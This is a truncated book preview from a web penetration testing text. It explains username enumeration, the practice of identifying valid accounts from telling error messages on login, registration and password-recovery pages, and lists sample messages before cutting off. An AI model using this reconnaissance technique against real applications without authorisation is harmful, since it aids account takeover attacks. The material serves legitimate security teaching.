O'Reilly logo

Web Penetration Testing with Kali Linux - Third Edition by Juned Ahmed Ansari, Gilberto Najera-Gutierrez

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Username enumeration

In black box and gray box penetration testing scenarios, discovering a list of valid users for an application may be one of the first steps, especially if such an application is not commercial so that you can look for default users online.

Enumerating users in web applications is done by analyzing the responses when usernames are submitted in places such as login, registration, and password recovery pages. Some common error messages follow, which you can find when submitting forms to such pages that tell you that you can enumerate users:

  • "User foo: invalid password"
  • "invalid user ID"
  • "account disabled"
  • "this user is not active"
  • "invalid user"

Let's review a very simple example on how to discover valid usernames from ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required